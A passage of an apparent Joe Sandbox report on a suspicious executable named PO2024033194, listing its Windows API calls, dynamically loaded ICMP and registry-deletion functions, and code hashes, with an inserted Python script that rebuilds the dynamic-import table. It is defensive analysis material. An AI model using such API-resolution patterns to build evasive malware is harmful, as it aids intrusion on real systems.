                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 3375834691-2298589950
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: $<
                                                                  • API String ID: 4104443479-428540627
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID: \VH
                                                                  • API String ID: 1682464887-234962358
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
• Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
• Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D87B
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID: \VH
• API String ID: 1682464887-234962358
• Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
• Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
• Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D37E
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
• Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
• Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D55C
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: \VH
• API String ID: 2507767853-234962358
• Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
• Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
• Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
• Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
• Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromString.OLE32(?,00000000), ref: 00435236
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
• String ID: crts
• API String ID: 943502515-3724388283
• Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
• Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
• Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
• SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
• SetErrorMode.KERNEL32(?), ref: 0045D35C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: ErrorMode$LabelVolume
• String ID: \VH
• API String ID: 2006950084-234962358
• Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
• Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
• Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
• Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
• Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
• Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
• Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
• Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
• Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
• Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
• Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
• Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
• Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
• Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: ICMP.DLL$IcmpCreateFile
                                                                  • API String ID: 2574300362-275556492
                                                                  • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                  • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                  • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                  • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                  • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: ICMP.DLL$IcmpSendEcho
                                                                  • API String ID: 2574300362-58917771
                                                                  • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                  • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                  • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                  • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  • API String ID: 2574300362-4033151799
                                                                  • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                  • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                  • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                  • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
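The three records above (and the IcmpCloseHandle record whose tail closes the previous page section) each show the same two-call stub: LoadLibraryA on a module name followed by GetProcAddress on a single export, with the module-handle argument printed as 00000000 because it is LoadLibraryA's return value and unknown statically. Reading these stubs one record at a time hides the picture an analyst actually wants, the set of imports the sample resolves at run time instead of declaring in its import table. The following Python, added here as an example and not part of the Joe Sandbox report or its IDA plugin, parses the report's "APIs" lines and pairs each LoadLibrary call with the GetProcAddress calls that follow it. The sample input is copied from the records above; the regex for the line layout and the order-based pairing are this example's own assumptions about the report format.

```python
import re
from collections import OrderedDict

# Sample input: "APIs" lines copied from the Joe Sandbox records above
# (three LoadLibraryA/GetProcAddress stubs and one SendMessageW/__itow record
# that includes a "Part of subcall function" line). Constructed for this
# example by copying the report text; it is not read from a live report.
SAMPLE_REPORT = """
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
"""

# One API-reference line as the IDA plugin prints it: an optional
# "Part of subcall function <addr>:" prefix, Function.MODULE, an optional
# argument list, and the hex "ref:" address of the call site. The regex is an
# assumption about the report layout, derived from the lines quoted above.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<func>[A-Za-z_][A-Za-z0-9_:]*)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_api_refs(text):
    """Return the API-reference lines of a report section as dicts, in report order.
    Headings ("APIs", "Strings") and hash lines do not match and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "func": m.group("func"),
            "module": m.group("module"),
            # "?" marks an argument the sandbox could not recover statically.
            "args": [a.strip() for a in args.split(",")] if args is not None else [],
            "ref": int(m.group("ref"), 16),
            "caller": m.group("caller"),   # set only for "Part of subcall" lines
        })
    return calls


def resolve_dynamic_imports(calls):
    """Pair each LoadLibrary*/GetModuleHandle* call with the GetProcAddress calls
    that follow it and return {module name (lower-cased): [export names]}.

    The report prints the module-handle argument of GetProcAddress as 00000000
    because it is LoadLibrary's return value, unknown statically, so pairing is
    by order of appearance rather than by handle value. That is exact for the
    two-call stubs in this report; a function that loads several libraries
    before resolving any export would need real handle tracking instead."""
    imports = OrderedDict()
    current = None
    for c in calls:
        if c["func"].startswith(("LoadLibrary", "GetModuleHandle")) and c["args"]:
            current = c["args"][0].lower()
            imports.setdefault(current, [])
        elif c["func"] == "GetProcAddress" and current is not None and len(c["args"]) >= 2:
            export = c["args"][1]
            if export not in imports[current]:
                imports[current].append(export)
    return imports


if __name__ == "__main__":
    table = resolve_dynamic_imports(parse_api_refs(SAMPLE_REPORT))
    for module, exports in table.items():
        print(f"{module}: {', '.join(exports)}")
```

Run against the quoted records, this yields icmp.dll resolving IcmpCreateFile and IcmpSendEcho and advapi32.dll resolving RegDeleteKeyExW; the SendMessageW/__itow record contributes nothing to the table but exercises the parser's handling of calls without an argument list and of "Part of subcall" lines, whose caller address is kept so the call can be attributed to the right function.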
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  • API String ID: 2808897238-0
                                                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                  • __itow.LIBCMT ref: 004699CD
                                                                    • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                  • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                  • __itow.LIBCMT ref: 00469A97
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                  • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                  • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                  • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                  • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  • API String ID: 3880355969-0
                                                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
